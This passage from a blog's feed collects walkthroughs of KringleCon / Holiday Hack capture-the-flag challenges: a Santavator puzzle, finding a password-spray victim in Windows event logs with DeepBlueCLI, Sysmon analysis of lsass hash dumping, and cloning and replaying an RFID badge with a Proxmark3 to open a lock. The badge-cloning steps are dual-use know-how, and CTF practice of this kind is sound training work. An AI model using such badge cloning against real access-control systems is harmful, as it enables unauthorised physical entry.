&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Next I tried &lt;code>tmux attach&lt;/code> which revealed the colorful birdie:&lt;/p>
&lt;p>&lt;img src="../images/obj4/birdie.png" alt="TMUX Birdie">&lt;/p>
&lt;p>Talking again with &lt;code>Pepper Minstix&lt;/code> rewarded me with the below hints for the main objective:&lt;/p>
&lt;blockquote>
&lt;p>You found her! Thanks so much for getting her back!
Hey, maybe I can help YOU out!
There&amp;rsquo;s a Santavator that moves visitors from floor to floor, but it&amp;rsquo;s a bit wonky.
You&amp;rsquo;ll need a key and other odd objects. Try talking to Sparkle Redberry about the key.
For the odd objects, maybe just wander around the castle and see what you find on the floor.
Once you have a few, try using them to split, redirect, and color the Super Santavator Sparkle Stream (S4).&lt;/p>
&lt;/blockquote>
&lt;p>Next, I enter the Kringle Castle through the main entrance to talk with &lt;code>Sparkle Redberry&lt;/code> about the Santavator:&lt;/p>
&lt;p>&lt;img src="../images/obj4/sparkle-redberry.png" alt="Sparkle Redberry">&lt;/p>
&lt;blockquote>
&lt;p>Hey hey, Sparkle Redberry here!
The Santavator is on the fritz. Something with the wiring is grinchy, but maybe you can rig something up?
Here&amp;rsquo;s the key! Good luck!
On another note, I heard Santa say that he was thinking of canceling KringleCon this year!
At first, I thought it was a joke, but he seemed serious. I’m glad he changed his mind.
Have you had a chance to look at the Santavator yet?
With that key, you can look under the panel and see the Super Santavator Sparkle Stream (S4).
To get to different floors, you&amp;rsquo;ll need to power the various colored receivers.
&amp;hellip; There MAY be a way to bypass the S4 stream.&lt;/p>
&lt;/blockquote>
&lt;p>There&amp;rsquo;s also one hint in the badge for the main objective:&lt;/p>
&lt;ul>
&lt;li>It&amp;rsquo;s really more art than science. The goal is to put the right colored light into the receivers on the left and top of the panel.&lt;/li>
&lt;/ul>
&lt;p>Next I look around the castle to find the needed objects that will help me fix the wonky Santavator. Specifically I need to recover some colorful light bulbs, and a Hex Nut that will help steer and paint the electrons to correct color:&lt;/p>
&lt;p>&lt;img src="../images/obj4/santavator-init.png" alt="santavator-quick-fix">&lt;/p>
&lt;p>One of the light bulbs cannot be found until reaching the &lt;strong>Speaker Unprep Room&lt;/strong> on the 2nd Floor. It&amp;rsquo;s not possible to get to this floor until I tweak the Santavator to take me there. Luckily the green bulb and the Hex Nut are easy to find and are enough to complete this objective. Once the green electrons are flying into the green tunnel in sufficient number I could close the lid and press the button to the 2nd floor:&lt;/p>
&lt;p>&lt;img src="../images/obj4/santavator-2nd-floor.png" alt="Second Floor">&lt;/p>
&lt;p>Which also completes this objective.&lt;/p>
&lt;p>On to the next one! 😎&lt;/p></description></item><item><title>Windows Log Analysis - Evaluate Attack Outcome</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective3/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective3/</guid><description>&lt;h2 id="find-the-sprayer">Find the sprayer!&lt;/h2>
&lt;p>Instructions from the badge:&lt;/p>
&lt;blockquote>
&lt;p>We&amp;rsquo;re seeing attacks against the Elf U domain!
Using the event log data, identify the user account that the attacker compromised using a password spray attack.
Bushy Evergreen is hanging out in the train station and may be able to help you out.&lt;/p>
&lt;/blockquote>
&lt;p>Link to Event logs: &lt;a href="https://downloads.elfu.org/Security.evtx.zip">https://downloads.elfu.org/Security.evtx.zip&lt;/a> (this file is binary, so a preview is not possible).&lt;/p>
&lt;h2 id="technical-challenge">Technical Challenge&lt;/h2>
&lt;p>If you need further help before solving this objective, head down to the &lt;strong>Train Station&lt;/strong> and talk with &lt;strong>Bushy Evergreen&lt;/strong>. He will be glad to help you, as long as you help him out with an issue with his terminal:&lt;/p>
&lt;p>&lt;img src="../images/obj3-bushy.png" alt="Bushy Evergreen">&lt;/p>
&lt;blockquote>
&lt;p>Hi, I&amp;rsquo;m Bushy Evergreen. Welcome to Elf U!
I&amp;rsquo;m glad you&amp;rsquo;re here. I&amp;rsquo;m the target of a terrible trick.
Pepper Minstix is at it again, sticking me in a text editor.
Pepper is forcing me to learn ed.
Even the hint is ugly. Why can&amp;rsquo;t I just use Gedit?
Please help me just quit the grinchy thing.&lt;/p>
&lt;/blockquote>
&lt;p>Click on the &lt;strong>TERMINAL&lt;/strong> next to him, and solve the presented problem:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash"> ........................................
.&lt;span class="p">;&lt;/span>oooooooooooool&lt;span class="p">;&lt;/span>,,,,,,,,:loooooooooooooll:
.:oooooooooooooc&lt;span class="p">;&lt;/span>,,,,,,,,:ooooooooooooollooo:
.&lt;span class="s1">&amp;#39;;;;;;;;;;;;;;;,&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&lt;/span>&lt;span class="p">;;;;;;;;;;;;;&lt;/span>,&lt;span class="p">;&lt;/span>ooooo:
.&lt;span class="s1">&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;;ooooo:
&lt;/span>&lt;span class="s1"> ;oooooooooooool;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&lt;/span>,:loooooooooooolc&lt;span class="p">;&lt;/span>&lt;span class="s1">&amp;#39;,,;ooooo:
&lt;/span>&lt;span class="s1"> .:oooooooooooooc;&amp;#39;&lt;/span>,,,,,,,:ooooooooooooolccoc,,,&lt;span class="p">;&lt;/span>ooooo:
.cooooooooooooo:,&lt;span class="s1">&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;,:ooooooooooooolcloooc,,,;ooooo,
&lt;/span>&lt;span class="s1">coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc,,,;ooo,
&lt;/span>&lt;span class="s1">coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc,,,;l&amp;#39;&lt;/span>
coooooooooooooo,,,,,,,,,&lt;span class="p">;&lt;/span>ooooooooooooooloooooc,,..
coooooooooooooo,,,,,,,,,&lt;span class="p">;&lt;/span>ooooooooooooooloooooc.
coooooooooooooo,,,,,,,,,&lt;span class="p">;&lt;/span>ooooooooooooooloooo:.
coooooooooooooo,,,,,,,,,&lt;span class="p">;&lt;/span>ooooooooooooooloo&lt;span class="p">;&lt;/span>
:llllllllllllll,&lt;span class="s1">&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&lt;/span>&lt;span class="p">;&lt;/span>llllllllllllllc,
Oh, many UNIX tools grow old, but this one&lt;span class="err">&amp;#39;&lt;/span>s showing gray.
That Pepper LOLs and rolls her eyes, sends mocking looks my way.
I need to exit, run - get out! - and celebrate the yule.
Your challenge is to &lt;span class="nb">help&lt;/span> this elf escape this blasted tool.
-Bushy Evergreen
Exit ed.
&lt;span class="m">1100&lt;/span>
q &lt;span class="o">&amp;lt;&amp;lt;&amp;lt;&lt;/span> &lt;span class="nb">type&lt;/span> q to &lt;span class="nb">exit&lt;/span>
Loading, please wait......
You did it! Congratulations!
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Okay, it was a rather simple issue&amp;hellip; However, it was good practice, as you will encountering similar &lt;strong>technical challenges&lt;/strong> down the road. Once you go back and click on Bushy, you will finally get your hints for solving this challenge:&lt;/p>
&lt;blockquote>
&lt;p>Wow, that was much easier than I&amp;rsquo;d thought.
Maybe I don&amp;rsquo;t need a clunky GUI after all!
Have you taken a look at the password spray attack artifacts?
I&amp;rsquo;ll bet that DeepBlueCLI tool is helpful.
You can check it out on GitHub.
It was written by that Eric Conrad.
He lives in Maine - not too far from here!&lt;/p>
&lt;/blockquote>
&lt;p>What he is essentially telling you is to use
&lt;a href="https://github.com/sans-blue-team/DeepBlueCLI" target="_blank" rel="noopener">this&lt;/a> tool, to solve Objective 3. For this purpose you will be most likely needing a windows-based machine (physical or virtual does not matter). You should first clone the given repository from GitHub, and then download the &lt;code>Security.evtx&lt;/code> file provided in the Objective description. Then you should execute the &lt;code>DeepBlue.ps1&lt;/code> script with this file as its first argument. Be sure to start a new PowerShell session as &lt;strong>ADMIN&lt;/strong>!&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">&lt;span class="c1"># command #1 set the execution policy unrestricted so we can call the DeepBlueCLI script&lt;/span>
$ Set-ExecutionPolicy unrestricted
&lt;span class="c1"># command #2&lt;/span>
$ .&lt;span class="se">\D&lt;/span>eepBlue.ps1 .&lt;span class="se">\S&lt;/span>ecurity.evtx
...
Date : 2019. 08. 24. 2:00:20
Log : Security
EventID : &lt;span class="m">4672&lt;/span>
Message : High number of logon failures &lt;span class="k">for&lt;/span> one account
Results : Username: supatree
Total logon failures: &lt;span class="m">76&lt;/span>
...
Date : 2019. 08. 24. 2:00:20
Log : Security
EventID : &lt;span class="m">4672&lt;/span>
Message : Multiple admin logons &lt;span class="k">for&lt;/span> one account
Results : Username: pminstix
User SID Access Count: &lt;span class="m">2&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>&lt;em>Full output can be seen in this PB document: &lt;a href="https://pastebin.com/X5LBNVCy">https://pastebin.com/X5LBNVCy&lt;/a>&lt;/em>&lt;/p>
&lt;p>After the DeepBlueCLI tool finished processing the file, it will produce a ton of output. Your task will be to find the account name and submit it through your personal badge, to see if it is the right solution. When I was trying to solve this challenge, I just scrolled until I found &lt;code>pminstix&lt;/code> and &lt;code>supatree&lt;/code> account names. I first tried the former, which did not work, and thentried to submit the latter, which did work, so objective #3 is now solved!&lt;/p>
&lt;p>One could probably write a more sophisticated script to parse and search for same the answer, but simple ways can sometimes lead to quicker solutions&amp;hellip; :)&lt;/p></description></item><item><title>Open HID Lock</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective5/</link><pubDate>Thu, 24 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective5/</guid><description>&lt;p>&lt;img src="../images/obj5/objective5.png" alt="Objective5">&lt;/p>
&lt;p>Once I figured out how to operate the Santavator, I went up to the 2nd floor where I find several rooms hosting the virtual KringleCon Talks as well as &lt;code>Bushy Evergreen&lt;/code>. He&amp;rsquo;s supposed to give hints for solving the main objective, but first he desperately needs my help getting into the Speaker Unpreparedness Room:&lt;/p>
&lt;p>&lt;img src="../images/obj5/bushy-evergreen.png" alt="Bushy Evergreen">&lt;/p>
&lt;blockquote>
&lt;p>Ohai! Bushy Evergreen, just trying to get this door open.
It&amp;rsquo;s running some Rust code written by Alabaster Snowball.
I&amp;rsquo;m pretty sure the password I need for ./door is right in the executable itself.
Isn&amp;rsquo;t there a way to view the human-readable strings in a binary file?&lt;/p>
&lt;/blockquote>
&lt;p>Opening the door was quite easy with his tip on the use of the &lt;code>strings&lt;/code> utility on the main binary executable:&lt;/p>
&lt;p>&lt;img src="../images/obj5/door-unlock.png" alt="Door Unlock Terminal Challenge">&lt;/p>
&lt;p>After the door was finally open, Bushy asks if I would like to help some more by turning on the lights in the room. Somehow this is not as trivial as it sounds:&lt;/p>
&lt;blockquote>
&lt;p>That&amp;rsquo;s it! What a great password&amp;hellip;
Hey, you want to help me figure out the light switch too? Those come in handy sometimes.
The password we need is in the lights.conf file, but it seems to be encrypted.
There&amp;rsquo;s another instance of the program and configuration in ~/lab/ you can play around with.
What if we set the user name to an encrypted value?&lt;/p>
&lt;/blockquote>
&lt;p>Paying closer attention to the last sentence, the solution was quite straight-forward:&lt;/p>
&lt;p>&lt;img src="../images/obj5/lights-on.png" alt="Turn On Lights Sub-Challenge">&lt;/p>
&lt;p>Finally, he asks for help with the vending machine so speakers can get their snacks and beverages:&lt;/p>
&lt;blockquote>
&lt;p>Wow - that worked? I mean, it worked! Hooray for opportunistic decryption, I guess!
So hey, if you want, there&amp;rsquo;s one more challenge.
You see, there&amp;rsquo;s a vending machine in there that the speakers like to use sometimes.
Play around with ./vending_machines in the lab folder.
You know what might be worth trying? Delete or rename the config file and run it.
Then you could set the password yourself to AAAAAAAA or BBBBBBBB.
If the encryption is simple code book or rotation ciphers, you&amp;rsquo;ll be able to roll back the original password.&lt;/p>
&lt;/blockquote>
&lt;p>Solving this one required some more craftiness, but brute-forcing the PW was not that difficult:&lt;/p>
&lt;p>&lt;img src="../images/obj5/vending-machine.png" alt="Vending Machine Sub-Challenge">&lt;/p>
&lt;blockquote>
&lt;p>Your lookup table worked - great job! That&amp;rsquo;s one way to defeat a polyalphabetic cipher!
Good luck navigating the rest of the castle.&lt;/p>
&lt;/blockquote>
&lt;p>At long last, below are the various hints from Bushy for solving these challenges:&lt;/p>
&lt;blockquote>
&lt;p>Santa asked me to ask you to evaluate the security of our new HID lock.
If ever you find yourself in posession of a Proxmark3, click it in your badge to interact with it.
It&amp;rsquo;s a slick device that can read others&amp;rsquo; badges!
Oh, did I mention that the Proxmark can simulate badges? Cool, huh?
There are lots of references online to help.
In fact, there&amp;rsquo;s a talk going on right now!
So hey, if you want, there&amp;rsquo;s one more challenge.
And that Proxmark thing? Some people scan other people&amp;rsquo;s badges and try those codes at locked doors.
Other people scan one or two and just try to vary room numbers.
Do whatever works best for you!&lt;/p>
&lt;/blockquote>
&lt;p>Now it was time to enter the room next to &lt;code>Bushy&lt;/code> and see what was hiding in there. With the lights turned on it was easy to some item lying on the ground, I&amp;rsquo;m sure it would be useful for tweaking the Santavator later on. Also, clicking the vending-machine a few times rewards you with some new items.&lt;/p>
&lt;p>Before turning to the main objective, I went to the Kitchen to help &lt;code>Fitzy Shortstack&lt;/code> with the Dial-Up Terminal that controls the internet connected X-mas lights:&lt;/p>
&lt;p>&lt;img src="../images/obj5/fitzy-shortstack.png" alt="Fitzy Shortstack">&lt;/p>
&lt;blockquote>
&lt;p>&amp;ldquo;Put it in the cloud,&amp;rdquo; they said&amp;hellip;
&amp;ldquo;It&amp;rsquo;ll be great,&amp;rdquo; they said&amp;hellip;
All the lights on the Christmas trees throughout the castle are controlled through a remote server.
We can shuffle the colors of the lights by connecting via dial-up, but our only modem is broken!
Fortunately, I speak dial-up. However, I can&amp;rsquo;t quite remember the handshake sequence.
Maybe you can help me out? The phone number is 756-8347; you can use this blue phone.&lt;/p>
&lt;/blockquote>
&lt;p>I proceed to listen to
&lt;a href="https://upload.wikimedia.org/wikipedia/commons/3/33/Dial_up_modem_noises.ogg" target="_blank" rel="noopener">THIS&lt;/a> tone to be able to figure out the sequence.&lt;/p>
&lt;p>Eventually I should find the correct sequence:&lt;/p>
&lt;ol>
&lt;li>ba DEE brrr&lt;/li>
&lt;li>aahh&lt;/li>
&lt;li>WEWEWwrwrwrr&lt;/li>
&lt;li>beDURRdunditty&lt;/li>
&lt;li>SCHHRRHHRTHRTR&lt;/li>
&lt;/ol>
&lt;p>&lt;img src="../images/obj5/dial-up.png" alt="Dial-Up Challenge">&lt;/p>
&lt;p>Which earns me this new hint:&lt;/p>
&lt;blockquote>
&lt;p>You know, Santa really seems to trust Shinny Upatree&amp;hellip;&lt;/p>
&lt;/blockquote>
&lt;p>Which doesn&amp;rsquo;t make too much sense at first, but earlier I learnt from &lt;code>Bushy&lt;/code> that a &lt;strong>ProxMark3&lt;/strong> device will be essential for opening the HID lock. It can be used to clone and replay RFID badges that can open the door in the Workshop. Maybe &lt;code>Shinny&lt;/code> is the one whose badge I should try to steal wih the &lt;strong>ProxMark3&lt;/strong>?&lt;/p>
&lt;p>Let&amp;rsquo;s find out!&lt;/p>
&lt;p>Next I head back to the Santavator and use the new items I found in the &lt;strong>Speaker Unpreparedness Room&lt;/strong> to unlock the journey up to the &lt;code>Workshop&lt;/code>!&lt;/p>
&lt;p>&lt;img src="../images/obj5/santavator.png" alt="Santavator">&lt;/p>
&lt;p>Upon entering, I check the small &lt;code>Wrapping Room&lt;/code> where I find the &lt;strong>ProxMark3&lt;/strong> I needed so much! I try to study it a bit by reading the short list of commands given in the badge:&lt;/p>
&lt;ul>
&lt;li>Larry Pesce knows a thing or two about
&lt;a href="https://www.youtube.com/watch?v=647U85Phxgo" target="_blank" rel="noopener">HID attacks&lt;/a>. He&amp;rsquo;s the author of a course on wireless hacking!&lt;/li>
&lt;li>Short list of essential proxmark commands
&lt;a href="https://gist.github.com/joswr1ght/efdb669d2f3feb018a22650ddc01f5f2" target="_blank" rel="noopener">HERE&lt;/a>&lt;/li>
&lt;/ul>
&lt;p>After watching that KringleCon talk on HID Card Hacking and reading the cheat-sheet, I head back to the Castle&amp;rsquo;s &lt;strong>Front Lawn&lt;/strong> to try to steal &lt;code>Shinny's&lt;/code> RFID card details with the command &lt;code>lf hid read&lt;/code>:&lt;/p>
&lt;p>&lt;img src="../images/obj5/hid-read-shinny.png" alt="Trusted Shinny">&lt;/p>
&lt;p>That looks great! Now I go back to the &lt;code>Workshop&lt;/code>, I stand next to the HID protected door to replay &lt;code>Shinny's&lt;/code> card parameters with the &lt;strong>ProxMark3&lt;/strong>:&lt;/p>
&lt;p>&lt;img src="../images/obj5/hid-sim-shinny.png" alt="Cloned Shinny">&lt;/p>
&lt;p>Well that worked flawlessly! Let&amp;rsquo;s see what&amp;rsquo;s in this room.&lt;/p>
&lt;p>Hmmm&amp;hellip; it seems to be just dark and empty but with a really
&lt;a href="https://holidayhackchallenge.com/2020/album/Mary%20Ellen%20Kennel%20-%20I%20Wish%20I%20Could%20be%20Santa%20Claus.mp3" target="_blank" rel="noopener">NICE&lt;/a> song! I stop for a moment to appreciate it.&lt;/p>
&lt;p>Then I check if there is anything down there. Ohhhhhhhh wait&amp;hellip; I&amp;rsquo;ve become Santa himself?! 😱&lt;/p>
&lt;p>&lt;img src="../images/obj5/new-santa.png" alt="NewSanta">&lt;/p>
&lt;p>On to the next objective
&lt;a href="https://holidayhackchallenge.com/2020/album/Skoudis%20-%20Is%20That%20You%20Santa%20Clause.mp3" target="_blank" rel="noopener">🎅🏻&lt;/a>!&lt;/p></description></item><item><title>Windows Log Analysis - Determine Attacker Technique</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective4/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective4/</guid><description>&lt;h2 id="un-redact-that-thing">Un-redact that thing!&lt;/h2>
&lt;p>Instructions from the badge:&lt;/p>
&lt;blockquote>
&lt;p>Using these normalized Sysmon logs, identify the tool the attacker used to retrieve domain password hashes from the lsass.exe process. For hints on achieving this objective, please visit Hermey Hall and talk with SugarPlum Mary.&lt;/p>
&lt;/blockquote>
&lt;p>Link to the
&lt;a href="https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon" target="_blank" rel="noopener">SysMon&lt;/a>
&lt;a href="https://downloads.elfu.org/sysmon-data.json.zip" target="_blank" rel="noopener">logs&lt;/a> and below you can see some sample data:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-json" data-lang="json">&lt;span class="p">{&lt;/span>
&lt;span class="nt">&amp;#34;command_line&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;cmd.exe /c echo besewi &amp;gt; \\\\.\\pipe\\besewi&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;event_type&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;process&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;logon_id&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="mi">999&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;parent_process_name&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;services.exe&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;parent_process_path&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;C:\\Windows\\System32\\services.exe&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;pid&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="mi">3812&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;ppid&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="mi">616&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;process_name&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;cmd.exe&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;process_path&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;C:\\Windows\\System32\\cmd.exe&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;subtype&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;create&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;timestamp&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="mi">132186397959850000&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;unique_pid&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;{7431d376-deb3-5dd3-0000-001096a84f00}&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;unique_ppid&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;{7431d376-cd7f-5dd3-0000-001010910000}&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;user&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;NT AUTHORITY\\SYSTEM&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;user_domain&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;NT AUTHORITY&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;user_name&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;SYSTEM&amp;#34;&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;h2 id="technical-challenge">Technical Challenge&lt;/h2>
&lt;p>To get some further hints for solving this challenge, you are told to talk with SugarPlum Mary in Hermey Hall. She is ready to give you some advice, as long as you help her first with an issue she is having with her terminal:&lt;/p>
&lt;p>&lt;img src="../images/obj4-mary.png" alt="SugarPlum Mary">&lt;/p>
&lt;blockquote>
&lt;p>Oh me oh my - I need some help!
I need to review some files in my Linux terminal, but I can&amp;rsquo;t get a file listing.
I know the command is ls, but it&amp;rsquo;s really acting up.
Do you think you could help me out? As you work on this, think about these questions:&lt;/p>
&lt;ol>
&lt;li>Do the words in green have special significance?&lt;/li>
&lt;li>How can I find a file with a specific name?&lt;/li>
&lt;li>What happens if there are multiple executables with the same name in my $PATH?&lt;/li>
&lt;/ol>
&lt;/blockquote>
&lt;p>When you click to view her terminal you get the following information:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">K000K000K000KK0KKKKKXKKKXKKKXKXXXXXNXXXX0kOKKKK0KXKKKKKKK0KKK0KK0KK0KK0KK0KK0KKKKKK
00K000KK0KKKKKKKKKXKKKXKKXXXXXXXXNXXNNXXooNOXKKXKKXKKKXKKKKKKKKKK0KKKKK0KK0KK0KKKKK
KKKKKKKKKKKXKKXXKXXXXXXXXXXXXXNXNNNNNNK0x:xoxOXXXKKXXKXXKKXKKKKKKKKKKKKKKKKKKKKKKKK
K000KK00KKKKKKKKXXKKXXXXNXXXNXXNNXNNNNNWk.ddkkXXXXXKKXKKXKKXKKXKKXKKXK0KK0KK0KKKKKK
00KKKKKKKKKXKKXXKXXXXXNXXXNXXNNNNNNNNWXXk,ldkOKKKXXXXKXKKXKKXKKXKKKKKKKKKK0KK0KK0XK
KKKXKKKXXKXXXXXNXXXNXXNNXNNNNNNNNNXkddk0No,&lt;span class="p">;;&lt;/span>:oKNK0OkOKXXKXKKXKKKKKKKKKKKKK0KK0KKKX
0KK0KKKKKXKKKXXKXNXXXNXXNNXNNNNXxl&lt;span class="p">;&lt;/span>o0NNNo,,,&lt;span class="p">;;;;&lt;/span>KWWWN0dlk0XXKKXKKXKKXKKKKKKKKKKKKKK
KKKKKKKKXKXXXKXXXXXNXXNNXNNNN0o&lt;span class="p">;;&lt;/span>lKNNXXl,,,,,,,,cNNNNNNKc&lt;span class="p">;&lt;/span>oOXKKXKKXKKXKKXKKKKKKKKKK
XKKKXKXXXXXXNXXNNXNNNNNNNNN0l&lt;span class="p">;&lt;/span>,cONNXNXc&lt;span class="s1">&amp;#39;,,,,,,,,,KXXXXXNNl,;oKXKKXKKKKKK0KKKKK0KKKX
&lt;/span>&lt;span class="s1">KKKKKKXKKXXKKXNXXNNXNNNNNXl;,:OKXXXNXc&amp;#39;&amp;#39;&amp;#39;&lt;/span>,,&lt;span class="s1">&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;,KKKKKKXXK,,;:OXKKXKKXKKX0KK0KK0KKK
&lt;/span>&lt;span class="s1">KKKKKKKKXKXXXXXNNXXNNNNW0:;,dXXXXXNK:&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&lt;/span>cKKKKKKKXX&lt;span class="p">;&lt;/span>,,,&lt;span class="p">;&lt;/span>0XKKXKKXKKXKKK0KK0KK
XXKXXXXXXXXXXNNNNNNNNNN0&lt;span class="p">;;;&lt;/span>ONXXXXNO,&lt;span class="s1">&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&lt;/span>x0KKKKKKXK,&lt;span class="s1">&amp;#39;,,,cXXKKKKKKKKXKKK0KKKX
&lt;/span>&lt;span class="s1">KKKKKKKXKKXXXXNNNNWNNNN:;:KNNXXXXO,&amp;#39;&lt;/span>.&lt;span class="s1">&amp;#39;..&amp;#39;&lt;/span>.&lt;span class="s1">&amp;#39;&amp;#39;&lt;/span>..&lt;span class="s1">&amp;#39;:O00KKKKKXd&amp;#39;&amp;#39;,,,,KKXKKXKKKKKKKKKKKKK
&lt;/span>&lt;span class="s1">KKKKKXKKXXXXXXXXNNXNNNx;cXNXXXXKk,&amp;#39;&amp;#39;&amp;#39;&lt;/span>.&lt;span class="s1">&amp;#39;&amp;#39;&lt;/span>.&lt;span class="s1">&amp;#39;&amp;#39;&amp;#39;&amp;#39;&lt;/span>.,xO00KKKKKO,&lt;span class="s1">&amp;#39;&amp;#39;&lt;/span>,,,,KK0XKKXKKK0KKKKKKKK
XXXXXXXXXKXXXXXXXNNNNNo&lt;span class="p">;&lt;/span>0NXXXKKO,&lt;span class="s1">&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;.&amp;#39;&lt;/span>.&lt;span class="s1">&amp;#39;.;dkOO0KKKK0;.&amp;#39;&amp;#39;,,,,XXXKKK0KK0KKKKKKKKX
&lt;/span>&lt;span class="s1">XKKXXKXXXXXXXXXXXNNNNNcoNNXXKKO,&amp;#39;&amp;#39;&amp;#39;&amp;#39;.&amp;#39;&lt;/span>......:dxkOOO000k,..&lt;span class="s1">&amp;#39;&amp;#39;&amp;#39;,,lNXKXKKXKKK0KKKXKKKK
&lt;/span>&lt;span class="s1">KXXKKXXXKXXKXXXXXXXNNNoONNXXX0;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&lt;/span>..&lt;span class="s1">&amp;#39;lkkkkkkxxxd&amp;#39;&lt;/span>...&lt;span class="s1">&amp;#39;&amp;#39;&amp;#39;&amp;#39;&lt;/span>,0N0KKKKKXKKKKKK0XKKK
XXXXXKKXXKXXXXXXXXXXXXOONNNXXl,,&lt;span class="p">;;&lt;/span>,&lt;span class="p">;;;;;;;&lt;/span>d0K00Okddoc,,,,,,,,,xNNOXKKKKKXKKKKKKKXKK
XXXXXXXXXXXXXXXXXXXXXXXONNNXx&lt;span class="p">;;;;;;;;;&lt;/span>,,:xO0KK0Oxdoc,,,,,,,,,oNN0KXXKKXKKXKKKKKKKXK
XKXXKXXXXXXXXXXXXXXXXXXXXWNX:&lt;span class="p">;;;;;;;;;&lt;/span>,cO0KKKK0Okxl,,,,,,,,,oNNK0NXXXXXXXXXKKKKKKKX
XXXXXXXXXXXXXXXXXXXXXXXNNNWNc&lt;span class="p">;;&lt;/span>:&lt;span class="p">;;;;;;&lt;/span>xKXXXXXXKK0x,,,,,,,,,dXNK0NXXXXXXXXXXXKKXKKKK
